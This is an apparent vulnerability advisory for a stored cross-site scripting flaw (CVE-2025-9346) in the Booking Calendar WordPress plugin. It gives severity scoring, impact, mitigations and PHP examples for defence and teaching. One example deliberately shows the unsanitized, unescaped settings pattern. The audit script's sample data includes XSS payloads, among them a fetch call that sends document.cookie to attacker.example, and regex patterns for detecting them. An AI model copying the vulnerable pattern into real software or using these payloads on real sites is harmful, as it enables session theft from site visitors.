CVE-2025-9346: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in wpdevelop Booking Calendar
The Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via settings in all versions up to, and including, 10.14.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AI Analysis
Technical Summary
CVE-2025-9346 is a stored cross-site scripting (XSS) vulnerability in the Booking Calendar plugin for WordPress, developed by wpdevelop, affecting all versions up to and including 10.14.1. The root cause is the one CWE-79 names: input supplied through the plugin's settings is neither sufficiently sanitized when it is saved nor escaped when it is later written into a page. An authenticated attacker with Administrator-level privileges or higher can therefore store arbitrary script in a setting; the script is persisted in the database and executes in the browser of every user who loads a page that renders that setting. The CVSS v3.1 base score is 6.4 (medium), vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N: network-reachable, low attack complexity, privileges required, no user interaction, a scope change (the payload runs in visitors' browsers rather than only in the attacker's own session), low impact on confidentiality and integrity, none on availability. Note that the published vector carries PR:L although the description requires Administrator-level access, which would ordinarily be scored PR:H and yield a lower score. No exploitation in the wild is reported and no fix has been linked in this record. Despite the high privilege requirement, the flaw matters because it turns a compromised or malicious administrator account into a persistent foothold against every visitor: session hijacking, defacement, redirection, or further exploitation in the context of the affected site.
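As an added illustration (not code from the Booking Calendar plugin or from the advisory), the PHP below contrasts the settings-handling pattern the advisory describes, store unsanitized and echo unescaped, with the hardened form, sanitize on save and escape for the output context. The option names example_booking_title and example_booking_notice and the vuln_* and hardened_* functions are hypothetical; the WordPress API calls (register_setting, get_option, update_option, sanitize_text_field, wp_kses_post, esc_html, esc_attr, current_user_can, check_admin_referer) are real.

```php
<?php
// Added example, not code from the Booking Calendar plugin. Option names and
// function names are hypothetical; the WordPress API calls are real.

/* ---- Vulnerable pattern: the class of defect CVE-2025-9346 describes ---- */

// Saving: the submitted value is stored exactly as received.
function vuln_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    check_admin_referer( 'example_booking_settings' );
    if ( isset( $_POST['booking_title'] ) ) {
        // No sanitization: "<script>...</script>" lands in wp_options untouched.
        update_option( 'example_booking_title', wp_unslash( $_POST['booking_title'] ) );
    }
}

// Rendering: the stored value is echoed without escaping, so the injected
// script runs for every visitor of any page that shows the title.
function vuln_render_title() {
    $title = get_option( 'example_booking_title', '' );
    echo '<h2 class="booking-title">' . $title . '</h2>';
}

/* ---- Hardened pattern: sanitize on save, escape on output ---- */

function hardened_register_settings() {
    // Plain-text setting: strip all tags on save.
    register_setting(
        'example_booking_group',
        'example_booking_title',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'sanitize_text_field',
            'default'           => '',
        )
    );
    // Setting that must carry some markup: allow-list instead of trusting input.
    // wp_kses_post keeps <p>, <a>, <strong>... and drops <script> and on* handlers.
    register_setting(
        'example_booking_group',
        'example_booking_notice',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'wp_kses_post',
            'default'           => '',
        )
    );
}
add_action( 'admin_init', 'hardened_register_settings' );

function hardened_render_title() {
    $title  = get_option( 'example_booking_title', '' );
    $notice = get_option( 'example_booking_notice', '' );
    // Escape for the exact context: attribute value vs. text node.
    echo '<h2 class="booking-title" title="' . esc_attr( $title ) . '">'
        . esc_html( $title ) . '</h2>';
    // Re-apply the allow-list at output time: never assume storage was clean
    // (an older, unsanitized value may still be in the database).
    echo '<div class="booking-notice">' . wp_kses_post( $notice ) . '</div>';
}
```

The second half is the fix shape Wordfence's description implies ("insufficient input sanitization and output escaping"): a sanitize_callback on register_setting covers the save path, and context-specific escaping on every echo covers the output path. Doing both matters because values written before the fix was deployed stay in wp_options.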
Potential Impact
For European organizations running WordPress with the Booking Calendar plugin, this vulnerability poses a moderate risk. Because exploitation requires administrator-level access, the initial compromise is more likely to come through phishing, credential theft, or an insider than through the plugin itself. Once an attacker holds such an account, the injected script executes in the browsers of site visitors and other administrators, where it can steal session cookies, redirect users to malicious sites, or perform actions on their behalf; the consequences are data breaches, reputational damage, and loss of customer trust. One caveat on the practical gain for an attacker: on a single-site WordPress install, Administrators already hold the unfiltered_html capability and can place script in posts and widgets without any bug, so this flaw is most significant on multisite installs (where only super administrators have that capability) and on sites that set DISALLOW_UNFILTERED_HTML, where it is what turns an ordinary administrator account into a script-injection path. Organizations in e-commerce, government, healthcare, and education that rely on WordPress for booking or scheduling are particularly exposed. Because the XSS is stored, users with no elevated privileges at all are affected once the script is in place. Given the widespread use of WordPress in Europe and the popularity of booking plugins, the vulnerability could reach a broad range of organizations if not mitigated promptly.
Mitigation Recommendations
1. Restrict administrator access to trusted personnel and enforce multi-factor authentication (MFA) on all administrator accounts, since exploitation starts with an administrator session.
2. Monitor and audit administrator activity and the plugin's stored settings for unexpected changes or script-like content (script tags, inline event handlers, javascript: URLs).
3. Until a fixed release is available, disable or remove the Booking Calendar plugin where feasible, or confine it to non-critical sites.
4. Add Web Application Firewall (WAF) rules that flag or block XSS payloads submitted to the plugin's settings pages; because the submitter is an authenticated administrator, treat a blocked request as an incident to investigate rather than as noise.
5. Keep WordPress core and all plugins current, and apply the Booking Calendar update that addresses this issue as soon as it is published.
6. Train administrators on the risks of stored XSS and on safe input handling.
7. Include plugin configurations and input handling in security reviews and penetration tests.
8. Deploy a Content Security Policy (CSP) that does not permit inline script (for example a nonce- or hash-based script-src), so that an injected script block or event handler is refused by the browser even if it reaches the page.
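A triage helper for mitigation 2, added here and not part of the advisory or of the plugin: it scans option values for script-bearing content, decoding HTML entities first so encoded payloads are not missed. The option names and values are constructed sample data; on a real site you would feed it the plugin's own options, for instance exported with `wp option list --format=json` and mapped to a name => value array with json_decode.

```php
<?php
// Added example, not part of the advisory or of the Booking Calendar plugin.
// Audits option values for script-bearing content (mitigation step 2).
// The option names and values below are constructed sample data.

/** Flatten a scalar or (nested) array option value into one searchable string. */
function option_value_to_string( $value ): string {
    if ( is_array( $value ) ) {
        $parts = array();
        array_walk_recursive( $value, function ( $leaf ) use ( &$parts ) {
            if ( is_scalar( $leaf ) ) {
                $parts[] = (string) $leaf;
            }
        } );
        return implode( "\n", $parts );
    }
    return is_scalar( $value ) ? (string) $value : '';
}

/**
 * Return option_name => list of indicators for every option whose value
 * contains markup that has no business in a plain setting. Entities are
 * decoded first so "&lt;script&gt;" is examined as "<script>".
 * This is a triage heuristic: settings that legitimately hold HTML templates
 * will show up and must be reviewed by hand, not deleted automatically.
 *
 * @param array<string,mixed> $options option_name => option_value
 * @return array<string,string[]>
 */
function audit_options_for_script_injection( array $options ): array {
    $indicators = array(
        'script_tag'     => '/<\s*script\b/i',
        'event_handler'  => '/\bon[a-z]+\s*=/i',
        'javascript_url' => '/javascript\s*:/i',
        'active_element' => '/<\s*(svg|iframe|object|embed)\b/i',
        'data_html_url'  => '/data\s*:\s*text\/html/i',
    );
    $findings = array();
    foreach ( $options as $name => $value ) {
        $text    = option_value_to_string( $value );
        $decoded = html_entity_decode( $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
        $hits    = array();
        foreach ( $indicators as $label => $regex ) {
            if ( preg_match( $regex, $decoded ) === 1 ) {
                $hits[] = $label;
            }
        }
        if ( $hits ) {
            $findings[ $name ] = $hits;
        }
    }
    return $findings;
}

// Constructed sample rows standing in for wp_options entries.
$sample_options = array(
    'booking_title'        => 'Book a room',
    'booking_notice_html'  => '<p>Opening hours: 9&ndash;17</p>',
    'booking_footer'       => 'Thanks! <script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'booking_button_label' => 'Reserve<img src=x onerror=alert(document.domain)>',
    'booking_encoded'      => '&lt;svg onload=alert(1)&gt;',
    'booking_widget'       => array( 'header' => 'Hi', 'link' => 'javascript:alert(1)' ),
);

foreach ( audit_options_for_script_injection( $sample_options ) as $name => $hits ) {
    printf( "%-22s %s\n", $name, implode( ', ', $hits ) );
}
```

Run it periodically (or from a cron job) against a fresh export and diff the result against the previous run; a setting that newly acquires a script_tag or event_handler indicator after an administrator login is exactly the change mitigation 2 asks you to notice.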
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: Wordfence
- Date Reserved: 2025-08-22T14:17:13.254Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 68afd4e9ad5a09ad0068abb3
Added to database: 8/28/2025, 4:02:49 AM
Last enriched: 8/28/2025, 4:17:49 AM
Last updated: 8/28/2025, 8:39:54 AM